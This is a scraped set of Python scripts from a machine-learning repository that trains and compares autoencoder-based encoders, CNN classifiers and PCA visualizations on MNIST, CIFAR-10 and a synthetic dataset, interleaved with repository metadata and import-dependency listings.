                np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_trainable.non_trainable_weights)]))
            print('\nClassifier w/ Trainable Pretrained Encoder + FC Layers')
            print('Total parameters: ' + str(trainable_count + non_trainable_count))
            print('Trainable paramseter: ' + str(trainable_count))
            print('Non-trainable parameters: ' + str(non_trainable_count))
            trainable_count = int(
                np.sum([K.count_params(p) for p in set(mnist_classifier_random_e.trainable_weights)]))
            non_trainable_count = int(
                np.sum([K.count_params(p) for p in set(mnist_classifier_random_e.non_trainable_weights)]))
            print('\nClassifier w/ Random Encoder + FC Layers')
            print('Total parameters: ' + str(trainable_count + non_trainable_count))
            print('Trainable paramseter: ' + str(trainable_count))
            print('Non-trainable parameters: ' + str(non_trainable_count))
        # Compile models
        mnist_classifier_pretrained_e_frozen.compile(loss=keras.losses.categorical_crossentropy,
                                                     optimizer=keras.optimizers.Adadelta(),
                                                     metrics=['accuracy'])
        mnist_classifier_pretrained_e_trainable.compile(loss=keras.losses.categorical_crossentropy,
                                                        optimizer=keras.optimizers.Adadelta(),
                                                        metrics=['accuracy'])
        mnist_classifier_random_e.compile(loss=keras.losses.categorical_crossentropy,
                                          optimizer=keras.optimizers.Adadelta(),
                                          metrics=['accuracy'])
        ## Train models and save test accuracy
        # Train classifier with frozen pretrained encoder; the best val-loss
        # weights are checkpointed and restored before evaluation.
        model_checkpoint = ModelCheckpoint('classifier_1.h5', monitor='val_loss', verbose=1, save_best_only=True,
                                           mode='min')
        callbacks = [early_stopping, model_checkpoint]
        mnist_classifier_pretrained_e_frozen.fit(reduced_x_train, reduced_y_train,
                                                 batch_size=batch_size,
                                                 epochs=epochs,
                                                 verbose=1,
                                                 shuffle=True,
                                                 callbacks=callbacks,
                                                 validation_split=val_split)
        mnist_classifier_pretrained_e_frozen.load_weights('classifier_1.h5')
        score = mnist_classifier_pretrained_e_frozen.evaluate(x_test, y_test_one_hot, verbose=0)
        pretrained_frozen_score += score[1]  # score[1] is test accuracy
        # Train classifier with trainable pretrained encoder
        model_checkpoint = ModelCheckpoint('classifier_2.h5', monitor='val_loss', verbose=1, save_best_only=True,
                                           mode='min')
        callbacks = [early_stopping, model_checkpoint]
        mnist_classifier_pretrained_e_trainable.fit(reduced_x_train, reduced_y_train,
                                                    batch_size=batch_size,
                                                    epochs=epochs,
                                                    verbose=1,
                                                    callbacks=callbacks,
                                                    validation_split=val_split)
        mnist_classifier_pretrained_e_trainable.load_weights('classifier_2.h5')
        score = mnist_classifier_pretrained_e_trainable.evaluate(x_test, y_test_one_hot, verbose=0)
        pretrained_trainable_score += score[1]
        # Train classifier with randomly initialized encoder
        model_checkpoint = ModelCheckpoint('classifier_3.h5', monitor='val_loss', verbose=1, save_best_only=True,
                                           mode='min')
        callbacks = [early_stopping, model_checkpoint]
        mnist_classifier_random_e.fit(reduced_x_train, reduced_y_train,
                                      batch_size=batch_size,
                                      epochs=epochs,
                                      verbose=1,
                                      callbacks=callbacks,
                                      validation_split=val_split)
        mnist_classifier_random_e.load_weights('classifier_3.h5')
        score = mnist_classifier_random_e.evaluate(x_test, y_test_one_hot, verbose=0)
        random_score += score[1]
    # Record average classification accuracy (%) for each no. of labelled examples
    classifier_pretrained_frozen_acc[index] = 100 * pretrained_frozen_score / num_iterations
    classifier_pretrained_trainable_acc[index] = 100 * pretrained_trainable_score / num_iterations
    classifier_random_acc[index] = 100 * random_score / num_iterations
# Print accuracies of classifiers on full training set
# FIX: corrected the 'Classifer' typo in the printed heading.
print("Classifier Accuracies\n")
print("Frozen Pretrained Encoder + FC Layers: " + str(classifier_pretrained_frozen_acc[-1]) + "%")
print("Trainable Pretrained Encoder + FC Layers: " + str(classifier_pretrained_trainable_acc[-1]) + "%")
print("Randomly Initialized Encoder + FC Layers: " + str(classifier_random_acc[-1]) + "%")
## Plot results
# Plot comparison graph of all three classifier variants
plt.plot(num_unlabelled, classifier_pretrained_frozen_acc, '-o', num_unlabelled, classifier_pretrained_trainable_acc,
         '-o', num_unlabelled, classifier_random_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['Frozen Pretrained Encoder', 'Trainable Pretrained Encoder', 'Randomly Initialized Encoder'], loc='lower right')
plt.grid()
plt.savefig('Images/mnist_classifier_num_labels_compar.png')
plt.show()
# Plot for frozen pretrained network
# FIX: closed the unbalanced parenthesis in the title.
plt.plot(num_unlabelled, classifier_pretrained_frozen_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Frozen Pretrained E)')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.show()
# Plot for trainable pretrained network
plt.plot(num_unlabelled, classifier_pretrained_trainable_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Trainable Pretrained E)')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.show()
# Plot for supervised network
# FIX: closed the unbalanced parenthesis in the title.
plt.plot(num_unlabelled, classifier_random_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Random E)')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.show()
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,475 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_pca.py | from __future__ import print_function, division
import numpy as np
from sklearn import decomposition
import matplotlib.pyplot as plt
from matplotlib import cm
# Set random seed for reproducibility
np.random.seed(12345)

# =====================================
# Define constants
# =====================================
img_dim = 4
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 2   # number of principal components kept for the 2-D plot
num_classes = 16
image_path = 'Images/sd_pca'

# =====================================
# Load dataset
# =====================================
# Load dataset
X_train = np.loadtxt('Dataset/synthetic_dataset_x_train.txt', dtype=np.float32)
X_test = np.loadtxt('Dataset/synthetic_dataset_x_test.txt', dtype=np.float32)
# Fix: ``np.int`` was deprecated in NumPy 1.20 and removed in 1.24; the
# builtin ``int`` is the documented replacement and parses the labels
# identically.
y_train = np.loadtxt('Dataset/synthetic_dataset_y_train.txt', dtype=int)
y_test = np.loadtxt('Dataset/synthetic_dataset_y_test.txt', dtype=int)

# =====================================
# Perform PCA Algorithm
# =====================================
# Project the training vectors onto their first `latent_dim` principal components.
pca = decomposition.PCA(n_components=latent_dim)
z = pca.fit_transform(X_train)

# =====================================
# Save 2D latent visualization
# =====================================
fig = plt.figure()
ax = fig.add_subplot(111)
colors = cm.Spectral(np.linspace(0, 1, num_classes))
xx = z[:, 0]
yy = z[:, 1]

# Plot 2D data points, one colour per class label
for i in range(num_classes):
    ax.scatter(xx[y_train == i], yy[y_train == i], color=colors[i], label=i, s=5)
plt.axis('tight')
plt.savefig(image_path + '_latent_vis.png')
plt.close() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,476 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_plot_results.py | import numpy as np
import matplotlib.pyplot as plt
# Load the per-classifier test-accuracy curves saved by the training runs.
# classifier6.txt is read as well (matching the original script) even though
# only the first five curves are drawn below.
class1, class2, class3, class4, class5, class6 = (
    np.loadtxt('Results/classifier%d.txt' % idx, dtype=np.float32)
    for idx in range(1, 7)
)

num_unlabelled = [100, 200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 50000]

# Plot comparison graph: one accuracy-vs-label-count curve per encoder type.
plt.figure()
for curve in (class1, class2, class3, class4, class5):
    plt.plot(num_unlabelled, curve, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['Basic AE Encoder', 'DAE Encoder', 'AAE Encoder', 'VAE Encoder',
            'BiGAN Encoder'], loc='lower right')
plt.grid()
plt.savefig('cifar10_model_compar.png')
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,477 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/bigan/mnist_cnn_fully_augmented.py | '''Trains a simple convnet on the MNIST dataset.
Gets over 99% test accuracy after 12 epochs
3 to 4 seconds per epoch on a TitanX GPU.
'''
import keras
from keras.preprocessing.image import ImageDataGenerator
from keras.datasets import mnist
from keras.datasets import cifar10
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
import matplotlib.pyplot as plt
from keras.callbacks import EarlyStopping, ModelCheckpoint
from sklearn.model_selection import train_test_split
import numpy as np
# Training hyper-parameters.
batch_size = 128
num_classes = 10  # MNIST digit classes
epochs = 100  # NOTE(review): unused below — fit_generator hard-codes epochs=50; confirm which is intended
channels = 1  # greyscale images
num_train_samples = 55000  # 60000 train images minus the 1/12 validation split below
num_val_samples = 5000
# Function to plot training loss curves
def plot_train_loss(history):
    """Plot training and validation loss from a Keras ``History`` object.

    Bug fix: the train curve previously plotted ``history.history['acc']``
    (accuracy) while being labelled as loss and compared against
    ``val_loss``; it now plots ``'loss'`` so both curves share a scale.
    """
    plt.plot(history.history['loss'])
    plt.plot(history.history['val_loss'])
    plt.title('Model Loss')
    plt.ylabel('Loss')
    plt.xlabel('Epoch')
    plt.legend(['Train', 'Validation'], loc='upper right')
    plt.show()
# Input image dimensions (MNIST digits are 28x28 greyscale).
img_rows, img_cols = 28, 28

# the data, shuffled and split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data()

# Reshape to 4-D tensors in whichever channel layout the backend expects;
# the -1 lets numpy infer the (single) channel axis.
if K.image_data_format() == 'channels_first':
    x_train = x_train.reshape(x_train.shape[0], -1, img_rows, img_cols)
    x_test = x_test.reshape(x_test.shape[0], -1, img_rows, img_cols)
    input_shape = (channels, img_rows, img_cols)
else:
    x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, -1)
    x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, -1)
    input_shape = (img_rows, img_cols, channels)

# Scale pixel intensities from [0, 255] to [0, 1].
x_train = x_train.astype(np.float32) / 255.
x_test = x_test.astype(np.float32) / 255.

# convert class vectors to binary class matrices (one-hot encoding)
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)

# Define CNN model: two conv layers, one max-pool, then a dense softmax head.
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
                 activation='relu',
                 input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))

# Compile models
model.compile(loss='categorical_crossentropy',
              optimizer=keras.optimizers.Adadelta(),
              metrics=['accuracy'])

# NOTE(review): this evaluation runs BEFORE any training, so it reports the
# accuracy of the randomly initialised network — presumably an intentional
# baseline; confirm, otherwise these three lines can be removed.
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])

# Split training data into training and validation set (1/12 of 60000 = 5000).
X_train, X_val, y_train, y_val = train_test_split(x_train, y_train, test_size=1 / 12., random_state=12345)

# Define augmentation process for images.
# NOTE(review): horizontal_flip=True is unusual for digits (mirrored digits
# are generally not valid digits) — confirm this is intended.
data_generator = ImageDataGenerator(
    rotation_range=40,
    width_shift_range=0.2,
    height_shift_range=0.2,
    shear_range=0.2,
    zoom_range=0.2,
    horizontal_flip=True,
    fill_mode='nearest')

# Apply augmentation process to train and validation sets
train_batches = data_generator.flow(X_train, y_train, batch_size=batch_size)
val_batches = data_generator.flow(X_val, y_val, batch_size=batch_size)

# Specify callbacks: stop after 5 epochs without val_loss improvement, and
# keep only the best checkpoint on disk.
callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=5, verbose=0),
             ModelCheckpoint('mnist_faugmented_cnn.h5', monitor='val_loss', verbose=1, save_best_only=True, mode='min')]

# Train on augmented batches (epochs hard-coded to 50 here; the module-level
# `epochs` constant is not used).
history = model.fit_generator(train_batches,
                              epochs=50,
                              steps_per_epoch=num_train_samples // batch_size,
                              validation_data=val_batches,
                              validation_steps=num_val_samples // batch_size,
                              callbacks=callbacks)

# Restore the best checkpoint and report final test performance.
model.load_weights('mnist_faugmented_cnn.h5')
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,478 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_basic_ae_train.py | import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from functions.auxiliary_funcs import save_models
from functions.data_funcs import get_mnist
from functions.visualization_funcs import save_reconstructions, plot_train_accuracy, plot_train_loss
from mnist_mlp_models import encoder_model, generator_model
from common_models.common_models import autoencoder_model
# Set random seed for reproducibility
np.random.seed(12345)

# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1  # greyscale MNIST
img_shape = (img_rows, img_cols, channels)
latent_dim = 100  # dimensionality of the autoencoder bottleneck
num_classes = 10
image_path = 'Images/mnist_basic_ae'  # prefix for saved figures
model_path = 'Models/mnist_basic_ae'  # prefix for saved model weights

# =====================================
# Load dataset
# =====================================
# Training labels are not needed for unsupervised autoencoder training.
(X_train, _), (X_test, y_test) = get_mnist()

# =====================================
# Instantiate and compile models
# =====================================
# The autoencoder is the composition generator(encoder(x)), trained
# end-to-end to reconstruct its input under a per-pixel BCE loss.
encoder = encoder_model()
generator = generator_model()
autoencoder = autoencoder_model(encoder, generator)
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])

# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 50
batch_size = 128
patience = 5  # epochs of no val_loss improvement before early stop

# Specify callbacks for training: early stopping plus best-checkpoint saving.
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(model_path + '.h5', monitor='val_loss', verbose=1, save_best_only=True,
                                   mode='min')
callbacks = [early_stopping, model_checkpoint]

# Train model (input == target for an autoencoder; 1/12 of the training data
# is held out for validation).
history = autoencoder.fit(X_train, X_train,
                          epochs=epochs,
                          batch_size=batch_size,
                          shuffle=True,
                          validation_split=1/12.,
                          callbacks=callbacks,
                          verbose=1)

# Replace current encoder and decoder models with that from the best save autoencoder
# (fresh instances are built so the checkpoint weights load into clean models).
encoder = encoder_model()
generator = generator_model()
autoencoder = autoencoder_model(encoder, generator)
autoencoder.load_weights(model_path + '.h5')

# Save encoder and decoder models
save_models(path=model_path, encoder=encoder, generator=generator)

# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=False)

# Plot loss curves
plot_train_accuracy(image_path, history)
plot_train_loss(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
